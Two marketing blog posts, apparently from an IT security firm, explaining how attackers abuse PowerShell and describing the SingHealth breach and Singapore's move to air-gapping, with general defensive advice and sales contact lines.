Due to major strides in cybersecurity protection in the past few years, cyberattackers have needed to find alternate methods of infiltrating victims’ computers. One strategy that has seen a recent increase is the exploitation of programs that already exist on victims’ computers – a strategy called “Living off the Land”. IBM has stated that over 57% of cyberattacks in 2019 have used this strategy to avoid detection by antivirus software. Furthermore,  a recent study IBM also discovered that one of the most common tools exploited by cyberattackers is a software called Powershell. So how do cyberattackers exploit your programs?

What does Powershell do?

The main function of Powershell is to automate system tasks and allow for computer administrators to access and manage computers remotely. This provides massive productivity advantages, as administrators can manage and repair computer problems regardless of the system’s location. Other features of Powershell include tasks such as network sniffing, which similarly improve IT workflows for system administrators.

Microsoft has preinstalled PowerShell on all its Windows systems since 2005, and since 2016 the software has become widely available on other operating systems as well.

How can it be exploited?

There are many characteristics of Powershell that make it a prime target that cyberattackers exploit. Most importantly, it is widely installed due to the fact that it is prepackaged on Windows systems. Furthermore, it has the ability to bypass the usual security walls by accessing memory directly.

One strategy used by cyberattackers is to leverage Powershell as a malicious downloader to install and propagate malware. For instance, the Trojan.Kotver malware exploits Powershell by installing advertisements onto a system without the victim’s permission. In this case, the cyberattacker would benefit from the revenue generated by the victim’s non-consensual advertisement views.

Another malware that exploits Powershell is PowerGhost. This malicious software installs cryptomining software onto the victim’s computer, essentially cryptojacking the infected system.

How do you protect yourself?

While cyberattackers can leverage frameworks like Powershell in their cyberattacks to avoid detection, initial infection often still uses more traditional methods such as phishing or social engineering. Therefore, the best way to protect yourself is to become aware of the threats and tell-tale signs of phishing attacks. With that said, there are also many strategies to reduce the vulnerability that comes with using Powershell.

Firstly, ensure to disable Powershell altogether if it does not assist in your organization’s IT operations. If it must be used, ensure to constantly keep track of its activity to identify suspicious commands. Be particularly vigilant for activity coming from unknown locations or at strange times. Also, make sure the latest version of Powershell is installed, as outdated versions pose an even greater security threat.

Do not fall victim to cyberattack. Call us at +1 888 366 4443 for more information on how to keep yourself safe.

A major malware attack against Singapore’s Health Service sector has motivated the Singaporean Government to adopt a new strategy for protecting these systems from future cyber threats. The security measure that will be employed is called “Network Separation”, and involves completely disconnecting computers from the internet.

 

The Cyberattack on SingHealth

SingHealth, short for Singapore Health Services, is the country’s largest group of healthcare establishments. A recent malware attack against it resulted in the theft of the personal information of over 1.5 million patients. People who visited the hospitals between May 1^st 2016 and July 4^th 2018 were among those affected. Data that was exposed included the name, National Registration Identity Card (NRIC) number, and dates of birth of these individuals.

In addition to this, the medical information of another 160 000 patients, including Singapore’s Prime Minister Lee Hsien Loong was also stolen by the cyberattackers. This information included medicine that was prescribed and dispensed to these patients. Neither the identity of the perpetrators, nor the method of infiltration were discussed by the Ministry of Health in their statement.

Adopting a Drastic Defense Strategy

In response to the aftermath of this successful cyberattack, the Singaporean Government has adopted network separation, or “Air Gapping” as the method of defense to be used against future attack.

This practice involves disconnecting government systems that contain sensitive data from the internet, effectively creating an “air gap” between malware circulating on the internet, and these critical computers. The most common methods of infecting systems with malware include malicious download links, social engineering, and scanning the web for out-of-date systems with exploitable holes in their security. Therefore by disconnecting from the internet altogether, organizations can sever the cyberattackers’ pathway into their computers.

As noted by Singapore’s Deputy Prime Minister To Chee Hean, the strategy would have mitigated the damages of this cyberattack by “[disrupting] the cyber kill-chain for the hacker and [reducing] the surface area exposed to attack”. While the strategy has already been widely employed in Singapore’s public sector since 2016, the country’s Healthcare institutions have only just been disconnected.

While network separation is an effective method of eliminating cyberattack threats coming directly from the internet, it also has numerous disadvantages that need to be considered. The main upside of using an “Air Gap” to protect your organizations systems is that it makes it impossible for malware to reach your systems through malicious downloads links on the internet. Furthermore, it makes your system undetectable to automated scripts that constantly search for outdated servers to target.

However, this comes at a massive productivity tradeoff. As noted by Singapore’s Ministry of Health, “there will be some inconvenience for patients and healthcare staff”. This is caused by the fact that internal systems that rely on an internet connection to communicate with each other will also be unable to do so. For instance, if a doctor requires test results from the laboratory, they will now need to manually access the computer as opposed to simply pulling the data of the company server.

Furthermore, network separated systems also require more maintenance, due to the fact that they are no longer able to receive automatic updates distributed through the internet. As a result, patches will need to be manually downloaded and installed on these systems, and failure to do so will leave them highly vulnerable.

Finally, this strategy does not protect against malware that can be distributed through offline methods such as USB sticks. In fact, it may leave them even more vulnerable to these attacks because they are not constantly checking for updates from developers.

Previous Breaches of Network Separated Systems

In 2010, an Iranian uranium plant was infected with the “Stuxnet” malware despite being Air Gapped from the internet. The virus was introduced into the system through USB Flash Drives, and caused widespread disruption to the centrifuges at the institution.

Furthermore, “Brutal Kangaroo” is a malware that is believed to be developed by the CIA specifically for infiltrating Network Separated systems. Much like “Stuxnet”, this malware spreads through infected USB drives. A common solution to the vulnerabilities of “Air Gapping” is by using this method in tandem with data encryption, which encodes sensitive information on a computer, making it unreadable even when attackers infect a computer with malware.

Air Gapping has both advantages and disadvantage as a security measure. When it is paired with other security measures such as data encryption, it becomes a highly effective way of preventing many types of malware from infecting your organization’s computers. Our experts at GigE have years of experience in designing and employing security strategies tailored to your company’s needs. Contact us today at +1 (888) 366-4443 to get started today.